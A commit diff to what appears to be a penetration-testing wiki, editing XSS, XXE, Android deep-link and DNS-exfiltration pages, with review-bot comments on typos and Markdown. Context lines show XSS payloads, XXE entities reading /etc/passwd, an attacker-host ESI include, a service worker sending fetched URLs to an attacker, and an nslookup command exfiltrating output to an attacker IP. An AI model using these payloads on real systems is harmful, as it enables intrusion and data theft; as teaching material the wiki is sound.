GitBook: [master] 401 pages modified

This commit is contained in:
CPol 2020-11-20 10:55:52 +00:00 committed by gitbook-bot
parent fd2a491676
commit 21ef448842
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
5 changed files with 38 additions and 38 deletions

View file

@ -425,6 +425,7 @@ A broadcast receiver will be waiting for a type of message. Depending on ho the
### **Exploiting Schemes / Deep links**
You ca look for deep links manually, using tools like MobSF or scripts like [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).
You can **open** a declared **scheme** using **adb** or a **browser**:
```bash
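Review bot: typo in the added line "You ca look for deep links manually": it should read "You can look for deep links manually, using tools like MobSF or scripts like ...". The sentence that follows ("You can **open** a declared **scheme** ...") is fine.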

View file

@ -10,7 +10,7 @@
1. Can you create new HTML tags?
2. Can you use events or attributes supporting `javascript:` protocol?
3. Can you create your own HTML tags?
4. Can you bypass protections?
4. Can you bypass protections?
5. Is the HTML content being interpreted by any client side JS engine \(_AngularJS_, _VueJS_, _Mavo_...\), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
6. If you cannot create HTML tags that execute JS code,could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection.md).
2. Inside a **HTML tag**:
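Review bot: the edit to item 4 ("Can you bypass protections?") has no visible effect, since the old and new lines are identical as rendered, so it is presumably a trailing-whitespace change. Since the list is being touched anyway: items 1 and 3 ("Can you create new HTML tags?" / "Can you create your own HTML tags?") read as duplicates of each other, and item 6 is missing the space after the comma in "JS code,could".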
@ -21,7 +21,7 @@
3. Inside **JavaScript code**:
1. Can you escape the `<script>` tag?
2. Can you escape the string and execute different JS code?
3. Are your input in template literals ````````?
3. Are your input in template literals \`\`\`\`\`\`\`\`?
4. Can you bypass protections?
4. If **used**:
1. You could exploit a **DOM XSS**, pay attention how your input is controlled and if your **controlled input is used by any sink.**
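Review bot: the rewritten item 3 under "Inside JavaScript code" now escapes eight backticks (`\`\`\`\`\`\`\`\``), which renders as eight literal backticks rather than indicating a template-literal delimiter; the old line (a run of bare backticks) was equally unreadable. Suggest plain words instead, which also fixes the subject/verb agreement: "Is your input inside template literals (backticks)?".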
@ -61,7 +61,7 @@ In this case your input is reflected between **`<script> [...] </script>`** tags
* `'-alert(1)-'`
* `';-alert(1)//`
* `\';alert(1)//`
* If reflected inside template literals \`\` you can **embed JS expressions** using `${ ... }` syntax: ``var greetings = `Hello, ${alert(1)}```
* If reflected inside template literals \`\` you can **embed JS expressions** using `${ ... }` syntax: ```var greetings =``Hello, ${alert\(1\)}\`\`\`
### DOM
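Review bot: the new form of the template-literal bullet breaks the inline code: ```var greetings =``Hello, ${alert\(1\)}\`\`\` drops the space after `=`, opens a triple-backtick run inline and backslash-escapes the closing backticks, so the snippet no longer renders as the intended `var greetings = `Hello, ${alert(1)}``. Keep the previous line's double-backtick code span and leave the inner backticks and parentheses unescaped.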
@ -90,7 +90,7 @@ Once you have **located which tags are allowed**, you would need to **brute-forc
### Tags/Events brute-force
Go to [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click on _**Copy tags to clipboard**_. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can **brute force all the events** using the valid tags \(in the same web page click on _**Copy events to clipboard**_ and follow the same procedure as before\).
Go to [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click on _**Copy tags to clipboard**_. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can **brute force all the events** using the valid tags \(in the same web page click on _**Copy events to clipboard**_ and follow the same procedure as before\).
### Custom tags
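Review bot: the two versions of the "Tags/Events brute-force" paragraph are identical as rendered (whitespace-only change). While the line is being touched, "check if any tags wasn't discovered as malicious by the WAF" should read "check which tags were not flagged as malicious by the WAF".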
@ -192,7 +192,7 @@ If you **cannot escape from the tag**, you could create new attributes inside th
### Within the attribute
Even if you **cannot escape from the attribute** \(`"` is being encoded or deleted\), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.
Even if you **cannot escape from the attribute** \(`"` is being encoded or deleted\), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.
Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
#### **Bypass inside event using HTML encoding/URL encode**
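Review bot: no visible difference between the old and new "Within the attribute" paragraph. The sentence is hard to parse; suggest "depending on **which attribute** your value is reflected in, and on whether you control the whole value or only part of it, you may still be able to abuse it."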
@ -320,10 +320,10 @@ If `<>` are being sanitised you can still **escape the string** where your input
### Template literals \`\`
In order to construct **strings** apart from single and double quotes JS also accepts **backticks** ```````` . This is known as template literals as they allow to **embedded JS expressions** using `${ ... }` syntax.
Therefore, if you find that your **input** is being **reflected inside** a JS string that is using **backticks**, you can abuse the syntax `${ ... }` to execute **arbitrary JS code**:
In order to construct **strings** apart from single and double quotes JS also accepts **backticks** ``````````````` . This is known as template literals as they allow to **embedded JS expressions** using````````${ ... }`syntax.
Therefore, if you find that your **input** is being **reflected inside** a JS string that is using **backticks**, you can abuse the syntax`${ ... }\` to execute **arbitrary JS code**:
``var greetings = `Hello, <your input>```
```var greetings =``Hello, \`\`\`
This can be **abused** using: `${alert(1)}`
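Review bot: the rewritten example ```var greetings =``Hello, \`\`\` drops the `<your input>` placeholder, so the reader can no longer see where the reflected input lands inside the template literal; the previous line ``var greetings = `Hello, <your input>``` should be kept. In the paragraph above it, the backtick run has grown to fifteen characters and the spaces around `${ ... }` were removed ("using````````${ ... }`syntax"), which renders as a broken code span; a single pair of backticks in a code span, with spaces on both sides, is what is wanted.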
@ -554,8 +554,8 @@ for(var i=0; i<ports.length; i++) {
};
}
```
_Short times indicate a responding port_
_Longer times indicate no response_
_Short times indicate a responding port_ _Longer times indicate no response_
### Box to as for credentials
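Review bot: merging the two italic captions ("Short times indicate a responding port", "Longer times indicate no response") onto one line is fine, since Markdown would have joined them anyway. The heading that follows, "### Box to as for credentials", is missing a letter ("Box to ask for credentials") and is worth fixing in the same edit.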
@ -615,7 +615,7 @@ In order to exploit this vulnerability you need to find:
* A way to **upload arbitrary JS** files to the server and a **XSS to load the service worker** of the uploaded JS file
* A **vulnerable JSONP request** where you can **manipulate the output \(with arbitrary JS code\)** and a **XSS** to **load the JSONP with a payload** that will **load a malicious service worker**.
In the following example I'm going to present a code to **register a new service worke**r that will listen to the `fetch` event and will **send to the attackers server each fetched URL** \(this is the code you would need to **upload** to the **server** or load via a **vulnerable JSONP** response\):
In the following example I'm going to present a code to **register a new service worke**r that will listen to the `fetch` event and will **send to the attackers server each fetched URL** \(this is the code you would need to **upload** to the **server** or load via a **vulnerable JSONP** response\):
```javascript
self.addEventListener('fetch', function(e) {
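Review bot: the old and new lines of the service-worker paragraph are identical as rendered. Since the line is being touched anyway, the bold span `**register a new service worke**r` closes one character early (it should wrap "worker"), and "attackers server" should be "attacker's server".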
@ -728,7 +728,7 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
### XSS to SSRF
Got XSS on a **site that uses caching**? Try **upgrading that to SSRF** through Edge Side Include Injection with this payload:
Got XSS on a **site that uses caching**? Try **upgrading that to SSRF** through Edge Side Include Injection with this payload:
```python
<esi:include src="http://yoursite.com/capture" />
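Review bot: the fence below the touched line is tagged `python` but its content is an ESI tag (`<esi:include src="..." />`), not Python; tag it `markup` like the other XML/HTML fences on the page so the highlighting is not misleading. The two versions of the "XSS to SSRF" sentence are otherwise identical.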
@ -859,7 +859,7 @@ More info:
## XSS resources
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
[http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list) [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list) [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
[https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
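Review bot: the PayloadsAllTheThings link is unchanged as rendered, so this is a whitespace-only edit. The five links on the next line (xss-payloads.com, Pgaijin66, materaj, ismailtasdelen, rvrsh3ll) are run together on a single line while the other resources get one line each; give each link its own line for consistency.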

View file

@ -4,7 +4,7 @@ An XML External Entity attack is a type of attack against an application that pa
## XML Basics
**Most of this part was taken from this amazing Portswigger page:** [**https://portswigger.net/web-security/xxe/xml-entities**](https://portswigger.net/web-security/xxe/xml-entities)\*\*\*\*
**Most of this part was taken from this amazing Portswigger page:** [**https://portswigger.net/web-security/xxe/xml-entities**](https://portswigger.net/web-security/xxe/xml-entities)
### What is XML? <a id="what-is-xml"></a>
@ -74,8 +74,8 @@ In this attack I'm going to test if a simple new ENTITY declaration is working
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY toreplace "3"> ]>
<stockCheck>
<productId>&toreplace;</productId>
<storeId>1</storeId>
<productId>&toreplace;</productId>
<storeId>1</storeId>
</stockCheck>
```
@ -112,8 +112,8 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
<storeId>1</storeId>
<productId>&file;</productId>
<storeId>1</storeId>
</stockCheck3>
```
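Review bot: the closing tag in the context line `</stockCheck3>` does not match the opening `<stockCheck>`, so the document is not well-formed XML and a conforming parser will reject it before the `&file;` entity is ever expanded; unless the mismatch is deliberate, it should be `</stockCheck>` as in the earlier example. The re-indentation of `<productId>` and `<storeId>` itself is fine.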
@ -192,7 +192,7 @@ This DTD carries out the following steps:
* Uses the `eval` entity, which causes the dynamic declaration of the `error` entity to be performed.
* Uses the `error` entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the `/etc/passwd` file.
Invoke the external DTD error with:
Invoke the external DTD error with:
```markup
<?xml version="1.0" encoding="UTF-8"?>
@ -235,19 +235,19 @@ This DTD carries out the following steps:
* Redefines the XML parameter entity called `custom_entity`, which is already defined in the external DTD file. The entity is redefined as containing the [error-based XXE exploit](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages) that was already described, for triggering an error message containing the contents of the `/etc/passwd` file.
* Uses the `local_dtd` entity, so that the external DTD is interpreted, including the redefined value of the `custom_entity` entity. This results in the desired error message.
**Real world example:** Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso`
**Real world example:** Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso`
```markup
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
@ -336,12 +336,9 @@ Read the following post to **learn how to exploit a XXE uploading a PDF** file:
{% page-ref page="file-upload/pdf-upload-xxe-and-cors-bypass.md" %}
### Content-Type: From x-www-urlencoded to XML
If a POST request accepts the data in XML format, you could try to exploit a XXE in that request.
For example, if a normal request contains the following:
If a POST request accepts the data in XML format, you could try to exploit a XXE in that request. For example, if a normal request contains the following:
```markup
POST /action HTTP/1.0
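Review bot: joining the two sentences into one paragraph reads fine. While here, "exploit a XXE" should be "exploit an XXE" (both occurrences in this section).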
@ -350,7 +347,8 @@ Content-Length: 7
foo=bar
```
Then you might be able submit the following request, with the same result:
Then you might be able submit the following request, with the same result:
```markup
POST /action HTTP/1.0
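Review bot: the "Then you might be able submit" line is identical before and after the change; it is missing a word and should read "Then you might be able to submit the following request, with the same result:".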
@ -366,7 +364,7 @@ To change the request you could use a Burp Extension named “**Content Type Con
```markup
Content-Type: application/json;charset=UTF-8
{"root": {"root": {
"firstName": "Avinash",
"lastName": "",
@ -378,7 +376,7 @@ Content-Type: application/json;charset=UTF-8
```markup
Content-Type: application/xml;charset=UTF-8
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]>
<root>
@ -406,7 +404,7 @@ This only work if the XML server accepts the `data://` protocol.
### UTF-7
You can use the [**"Encode Recipe**" of cyberchef here ](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7%20%2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to transform to UTF-7.
You can use the \[**"Encode Recipe**" of cyberchef here \]\([https://gchq.github.io/CyberChef/\#recipe=Encode\_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4\)to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7%20%2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to) transform to UTF-7.
```markup
<!xml version="1.0" encoding="UTF-7"?-->
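Review bot: the rewritten CyberChef line breaks the link: the link text is now the backslash-escaped URL with `%20` turned into a literal space, and "to" is glued onto the closing parenthesis ("...\)to"), so the sentence renders as a wall of escaped characters. Revert to the previous form `[**"Encode Recipe**" of cyberchef here](<url>)` and add the missing space before "to transform to UTF-7".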
@ -603,7 +601,7 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
## Tools
{% embed url="https://github.com/luisfontes19/xxexploiter" %}
{% embed url="https://github.com/luisfontes19/xxexploiter" caption="" %}
## More resources

View file

@ -110,6 +110,7 @@ y por aqui la metodologia owasp para analizar firmware: [https://github.com/scri
* [https://github.com/ElevenPaths/HomePWN](https://github.com/ElevenPaths/HomePWN) : Hacking IoT \(Wifi, BLE, SSDP, MDNS\)
* [https://github.com/rackerlabs/scantron](https://github.com/rackerlabs/scantron) : automating scanning
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics.
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
##
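Review bot: the new bbrecon bullet matches the format of the surrounding list. The bare `##` heading that follows the list renders as an empty heading and should be removed or given a title.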

View file

@ -440,7 +440,7 @@ sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passi
#### Victim
_**for /f tokens**_ _\*\*_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
_**for /f tokens**_ \_\*\*\_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
```text
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
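Review bot: the rewritten line only re-escapes the `_\*\*_` debris as `\_\*\*\_technique`, which still renders as literal underscores and asterisks glued to the word "technique"; the intended text is presumably `**for /f tokens** technique: This allows us ...`, so drop the stray escape sequence rather than escaping it further.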